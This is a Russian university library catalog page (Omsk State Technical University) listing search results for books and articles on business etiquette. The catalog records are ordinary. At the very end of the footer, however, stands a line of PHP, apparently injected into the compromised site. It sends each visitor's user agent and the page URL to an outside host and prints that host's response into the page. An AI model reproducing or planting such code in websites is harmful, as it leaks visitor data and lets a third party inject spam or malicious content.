Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

163 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Деловой этикет")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 14
1. 
2. 
Морозов А. В. Деловая психология [Текст] : Курс лекций: Учеб. для высш. и сред. учеб. заведений / А. В. Морозов, 2002. - 571 с.
3. 
Архангельская, Марина Дмитриевна. Бизнес-этикет, или Игра по правилам : правила, принципы, рекомендации / М. Д. Архангельская, 2002. - 160 с.
Держатели документа (Информация об экземплярах) 
4. 
Руденко, Андрей Михайлович. Психология социально-культурного сервиса и туризма / А. М. Руденко, М. А. Довгалева, 2005. - 256 с.

В учебном пособии излагаются основы психологии социально-культурного сервиса и туризма. Подробно освещаются вопросы психологии продаж туристского продукта и обслуживания туристовв офисе, особенности делового этикета, психологии имиджа и конфликта в туризме. Изложены психологические особенности подготовки и проведения экскурсий.

Особое внимание уделяется психологии гостиничного и ресторанного сервиса, содержатся новые сведения об отдыхе и развлечениях, коммуникативной культуре работников средств размещения. Анализируются вопросы психологии менеджмента гостиниц и ресторанов. Рассматривается феномен полносервисных ресторанов.

Для студентов и преподавателей вузов, психологов, экскурсоводов, работников туристских фирм, гостиниц и ресторанов.

5. 
Управление персоналом. - Журнал, 2009г. № 7
Оглавление 
  • Шамарин, А. В. Совершенствование процедуры подбора персонала на предприятии / ; А. В. Шамарин, А. Н. Морозов, Е. В. Сухоруков. - с.48-50
    Кл. слова: ПЕРСОНАЛ - ПОДБОР
  • Вежливость и культура поведения не требуют денежных затрат, но это сплошь и рядом в самых разных компаниях дает коммерческий эффект . "Современные проблемы делового этикета и протокола в бизнесе". Круглый стол. - с.65-83
    Кл. слова: ДЕЛОВОЙ ЭТИКЕТ, ДЕЛОВАЯ ПЕРЕПИСКА, ДРЕСС-КОД
  • Богатырев, А. В. Инвестиции в условиях кризиса / А. В. Богатырев, А. А. Касимов. - с.42-43
    Кл. слова: ИНВЕСТИЦИИ, КРИЗИС
  • Опарина, Н. Н. Основные стратегии управления кадровым резервом / Н. Н. Опарина. - с.44-47
    Кл. слова: РЕЗЕРВ КАДРОВЫЙ
  • Шамарин, А. В. Совершенствование процедуры подбора персонала на предприятии / А. В. Шамарин, А. Н. Морозов, Е. В. Сухоруков. - с.48-50
    Кл. слова: ПОДБОР ПЕРСОНАЛА
  • Богомолова, И. П. Роль адаптации работника в адаптивном развитии предприятия на основе внедрения инноваций / И. П. Богомолова, Е. И. Кривенко. - с.51-52
    Кл. слова: АДАПТАЦИЯ, АДАПТАЦИЯ ПЕРСОНАЛА
6. 
Руденко, Андрей Михайлович. Психология социально-культурного сервиса и туризма / А. М. Руденко, М. А. Довгалева, 2005. - 256 с.
Держатели документа (Информация об экземплярах) 
7. 
Ботавина, Римма Николаевна. Этика деловых отношений [Текст] : Учеб. пособие по экономическим специальностям / Р. Н.Ботавина, 2001. - 203, [3] с.

Содержание книги дает представление о современных нормах и стандартах этики делового поведения, общения, договорной дисциплины. Рассматриваются этическая сторона презентаций, деловых приемов, требования к внешнему виду и манерам делового человека. Книга может служить своеобразным справочником по профессиональной этике в сфере деловой жизни.

8. 
Грачев Ю. Н. Внешнеэкономическая деятельность. Организация и техника внешнеторговых операций [Текст] : Учеб.-практ. пособие / Ю. Н. Грачев, 2001. - 592 с.
9. 
Честара, Джон. Деловой этикет [Текст] : Паблик рилейшнз / Д. Честара; Л. Бескова, 1997. - 334 с.
Держатели документа (Информация об экземплярах) 
10. 
Самоукин, Александр Иванович. Психология бизнеса [Текст] / А. И. Самоукин, Н. В. Самоукина, А. Л. Шишов, 1997. - 270 с.
11. 
Репутация, этикет, бизнес [Текст] / Бизнес-колледж "Ом. торговый дом", 1993. - 115 с.
Держатели документа (Информация об экземплярах) 
12. 
Честара, Джон. Деловой этикет [Текст] : Паблик рилейшнз для всех и для каждого / Д. Честара; Л. Бескова, 2000. - 334 с.
Держатели документа (Информация об экземплярах) 
13. 
Секерин В. Д. Маркетинг [Текст] : Учеб.-практ. пособие / В. Д. Секерин, 1999. - 350 с.
Держатели документа (Информация об экземплярах) 
14. 
Основы предпринимательского дела [Текст] : Благород. бизнес: Учеб. для вузов по направлениям "Экономика" и "Менеджмент" / В. А. Анташов, В. Г. Варшамова, Е. С. Зотова; Ю. М. Осипов, Е. Е. Смирнова, 1996. - 459 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2998 - 25.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.87 с.14 запросов, 0.78c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;